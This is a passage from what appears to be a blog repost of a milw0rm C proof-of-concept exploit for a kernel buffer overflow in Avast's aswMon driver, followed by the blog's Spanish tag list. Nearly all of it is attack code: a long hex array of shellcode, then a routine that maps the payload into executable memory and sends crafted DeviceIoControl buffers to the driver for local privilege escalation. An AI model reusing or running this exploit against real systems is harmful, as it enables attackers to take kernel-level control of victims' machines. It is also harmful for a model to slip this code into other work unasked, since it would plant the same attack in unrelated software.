0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529,
0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038,
0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549,
0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
0xe8f62f56, 0x58f7969a
};

DWORD ShellcodeToExecute;

int choix;
memset(welcome, 0x61, 100);
welcome[100] = 0;

ZeroMemory(out,sizeof(out));

printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept...\n\n");
getch();

MajShellcode("LocalEscalation_Avast.exe");
MajRealShellcode();
MajRealStack();

ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));

printf("Connecting... ");

hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
while(hDevice == (HANDLE) 0xffffffff){
hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
Sleep(1000);
}
printf("Found !\nHandle : %p\n",hDevice);

DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
AfficherListeFichiers();
printf("Written.\n");

CloseHandle(hDevice);
getch();
return 0;
}

// milw0rm.com [2009-08-24]

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)